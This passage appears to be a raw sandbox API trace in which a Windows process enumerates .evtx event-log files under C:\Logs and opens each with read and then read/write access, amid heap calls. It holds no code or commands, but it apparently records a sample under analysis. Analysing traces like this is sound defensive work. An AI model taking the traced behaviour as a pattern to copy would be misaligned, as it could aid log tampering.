CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx", lpUsedDefaultChar=0x0) returned 58 [0072.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0072.614] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.614] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0072.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0072.614] AreFileApisANSI () returned 1 [0072.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0072.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69bb0 [0072.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 58 [0072.614] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.614] GetFileType (hFile=0x418) returned 0x1 [0072.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0072.614] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.615] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.615] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.615] CloseHandle (hObject=0x418) returned 1 [0072.615] AreFileApisANSI () returned 1 [0072.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0072.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0072.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 58 [0072.615] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.615] GetFileType (hFile=0x418) returned 0x1 [0072.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0072.615] CloseHandle (hObject=0x418) returned 1 [0072.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0072.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0072.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0072.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0072.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0072.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0072.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0072.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0072.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0072.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0072.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0072.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0072.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0072.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0072.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0072.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0072.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0072.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0072.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0072.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0072.616] AreFileApisANSI () returned 1 [0072.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0072.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a4b0 [0072.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x6a4b0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 58 [0072.616] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd0763ff, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd0763ff, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0072.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0072.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0072.616] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.616] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.616] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5089d037, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5089d037, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", cAlternateFileName="MIAB1D~1.EVT")) returned 1 [0072.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0072.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0072.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0072.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0072.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0072.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x30c98 [0072.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0072.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0072.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0072.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8abb8 [0072.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0072.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0072.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0072.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0072.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0072.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0072.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0072.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0072.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0072.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0072.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0072.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0072.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0072.618] AreFileApisANSI () returned 1 [0072.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", lpUsedDefaultChar=0x0) returned 75 [0072.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0072.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0072.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0072.618] AreFileApisANSI () returned 1 [0072.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0072.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x859e0 [0072.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x859e0, cchWideChar=75 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 75 [0072.618] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.619] GetFileType (hFile=0x418) returned 0x1 [0072.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x859e0 | out: hHeap=0x20000) returned 1 [0072.619] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.619] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.619] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.619] CloseHandle (hObject=0x418) returned 1 [0072.619] AreFileApisANSI () returned 1 [0072.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0072.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x84fe0 [0072.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x84fe0, cchWideChar=75 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 75 [0072.620] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.620] GetFileType (hFile=0x418) returned 0x1 [0072.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fe0 | out: hHeap=0x20000) returned 1 [0072.620] CloseHandle (hObject=0x418) returned 1 [0072.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0072.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0072.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0072.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0072.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0072.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0072.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0072.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0072.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0072.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0072.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0072.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0072.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0072.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0072.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0072.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a958 [0072.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0072.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0072.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0072.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0072.621] AreFileApisANSI () returned 1 [0072.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0072.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85d00 [0072.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x85d00, cchWideChar=75 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 75 [0072.621] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5089d037, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5089d037, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85d00 | out: hHeap=0x20000) returned 1 [0072.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0072.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0072.621] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.621] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.621] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x508c32a6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x508c32a6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", cAlternateFileName="MI62D3~1.EVT")) returned 1 [0072.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0072.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0072.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0072.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0072.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0072.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ba8 [0072.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0072.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x30c98 [0072.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0072.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0072.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x51398 [0072.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30fc0 [0072.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0072.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0072.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0072.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0072.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0072.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0072.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0072.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0072.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81b40 [0072.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0072.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81638 [0072.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81b40 | out: hHeap=0x20000) returned 1 [0072.622] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.622] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.622] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.622] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81638 | out: hHeap=0x20000) returned 1 [0072.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.622] AreFileApisANSI () returned 1 [0072.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", lpUsedDefaultChar=0x0) returned 81 [0072.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0072.622] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.622] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, 